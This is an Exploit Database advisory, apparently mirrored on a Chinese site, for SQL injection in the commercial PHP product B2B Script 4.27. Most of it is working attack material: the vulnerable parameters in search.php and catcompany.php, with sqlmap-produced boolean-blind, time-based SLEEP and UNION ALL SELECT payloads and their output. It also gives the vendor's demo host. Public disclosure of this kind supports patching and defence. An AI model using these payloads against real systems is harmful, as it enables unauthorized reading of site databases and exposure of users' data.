B2B Script 4.27 – SQL Injection

• Exploit Database
• 38 阅读

• 作者： Dawid Morawski
  日期： 2017-01-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/41116/

• # Vulnerability: B2B Script v4.27 - SQL Injection
  # Date: 18.01.2017
  # Software link: http://itechscripts.com/b2b-script/
  # Demo: http://b2b.itechscripts.com
  # Price: 199$
  # Category: webapps
  # Exploit Author: Dawid Morawski
  # Website: http://www.morawskiweb.pl
  # Contact: dawidmorawski1990@gmail.com
  #######################################
  
  1. Description
  An attacker can exploit this vulnerability to read from the database.
  
  2. SQL Injection / Proof of Concept:
  
  http://localhost/[PATH]/search.php?keywords=[SQL]
  SQLmap outout:
  
  Parameter: keywords (GET)
  Type: boolean-based blind
  Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  Payload: keywords=-7908') OR 3641=3641#
  
  Type: UNION query
  Title: MySQL UNION query (NULL) - 2 columns
  Payload: keywords=Products') UNION ALL SELECT
  NULL,CONCAT(0x716b7a7871,0x68634473486965586e6b57754358736b487a43564c6963646e556549454e476177776a5a6a7a4c4c,0x71767a7a71)#
  ---
  [INFO] testing MySQL
   [INFO] confirming MySQL
   [INFO] the back-end DBMS is MySQL
  
  #########################################
  
  http://localhost/[PATH]/catcompany.php?token=[SQL]
  SQLmap outout:
  
  Parameter: token (GET)
  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause
  Payload: token=7532a5bfc9e07964f8dddeb95fc584cd965d' AND 9125=9125 AND
  'HhOm'='HhOm
  
  Type: AND/OR time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind
  Payload: token=7532a5bfc9e07964f8dddeb95fc584cd965d' AND SLEEP(5) AND
  'dWKJ'='dWKJ
  
  Type: UNION query
  Title: Generic UNION query (NULL) - 6 columns
  Payload: token=-7417' UNION ALL SELECT
  NULL,CONCAT(0x7171707071,0x6a6c6d484f58726e48446167417a66756464445941464844416856527a634a704f4b79647a494654,0x716b786271),NULL,NULL,NULL,NULL--
  aNXq